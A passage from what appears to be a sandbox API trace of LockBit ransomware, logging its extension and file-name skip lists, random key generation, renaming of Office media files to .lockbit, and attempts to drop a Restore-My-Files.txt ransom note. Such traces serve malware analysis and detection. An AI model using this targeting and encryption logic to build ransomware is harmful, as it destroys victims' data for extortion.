lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.873] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.874] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.874] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.874] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.874] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.874] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.874] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15056_.GIF") returned 1 [0203.874] lstrcmpiW (lpString1="ntldr", lpString2="BD15056_.GIF") returned 1 [0203.874] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15056_.GIF") returned 1 [0203.874] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15056_.GIF") returned 1 [0203.874] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15056_.GIF") returned -1 [0203.874] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15056_.GIF") returned 1 [0203.874] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15056_.GIF") returned 1 [0203.874] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.874] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15056_.GIF") returned=".GIF" [0203.875] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.875] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.875] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.875] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15056_.GIF.lockbit") returned 78 [0203.875] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15056_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15056_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.877] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.877] malloc (_Size=0x40068) returned 0x3df0008 [0203.877] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=218) returned 1 [0203.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.878] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.881] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15056_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15056_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.881] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.881] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.881] free (_Block=0x1fa2ed8) [0203.881] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15056_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.881] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.881] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.882] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95f37700, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcaa8f60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x95f37700, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xda, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15057_.GIF", cAlternateFileName="")) returned 1 [0203.882] lstrcmpiW (lpString1=".", lpString2="BD15057_.GIF") returned -1 [0203.882] lstrcmpiW (lpString1="..", lpString2="BD15057_.GIF") returned -1 [0203.882] PathFindExtensionW (pszPath="BD15057_.GIF") returned=".GIF" [0203.882] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.882] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.882] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.883] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.883] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15057_.GIF") returned 1 [0203.883] lstrcmpiW (lpString1="ntldr", lpString2="BD15057_.GIF") returned 1 [0203.883] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15057_.GIF") returned 1 [0203.883] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15057_.GIF") returned 1 [0203.883] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15057_.GIF") returned -1 [0203.883] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15057_.GIF") returned 1 [0203.883] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15057_.GIF") returned 1 [0203.883] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.883] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15057_.GIF") returned=".GIF" [0203.883] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.883] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.883] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.883] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.883] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.883] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.883] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.884] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.884] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.884] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.884] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.884] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.884] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.884] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.884] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.884] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.884] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15057_.GIF.lockbit") returned 78 [0203.884] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15057_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15057_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.885] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.885] malloc (_Size=0x40068) returned 0x3df0008 [0203.885] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=218) returned 1 [0203.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.886] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.889] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15057_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15057_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.889] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.889] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.889] free (_Block=0x1fa2ed8) [0203.889] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15057_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.890] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.890] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.890] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9724a400, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcaa8f60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9724a400, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xc7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15058_.GIF", cAlternateFileName="")) returned 1 [0203.890] lstrcmpiW (lpString1=".", lpString2="BD15058_.GIF") returned -1 [0203.890] lstrcmpiW (lpString1="..", lpString2="BD15058_.GIF") returned -1 [0203.890] PathFindExtensionW (pszPath="BD15058_.GIF") returned=".GIF" [0203.890] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.890] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.890] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.890] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.890] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.890] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.890] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.890] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.890] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.890] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.890] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.890] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.890] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.891] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.891] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.891] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15058_.GIF") returned 1 [0203.891] lstrcmpiW (lpString1="ntldr", lpString2="BD15058_.GIF") returned 1 [0203.891] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15058_.GIF") returned 1 [0203.891] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15058_.GIF") returned 1 [0203.891] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15058_.GIF") returned -1 [0203.891] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15058_.GIF") returned 1 [0203.891] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15058_.GIF") returned 1 [0203.891] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.891] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15058_.GIF") returned=".GIF" [0203.891] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.891] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.891] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.891] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.891] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.892] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.892] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.892] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.892] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.892] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.892] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.892] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.892] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.892] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.892] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.892] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.892] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15058_.GIF.lockbit") returned 78 [0203.892] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15058_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15058_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.893] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.893] malloc (_Size=0x40068) returned 0x3df0008 [0203.893] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=199) returned 1 [0203.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.894] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.894] BCryptGenRandom (in: hAlgorithm=0x0, 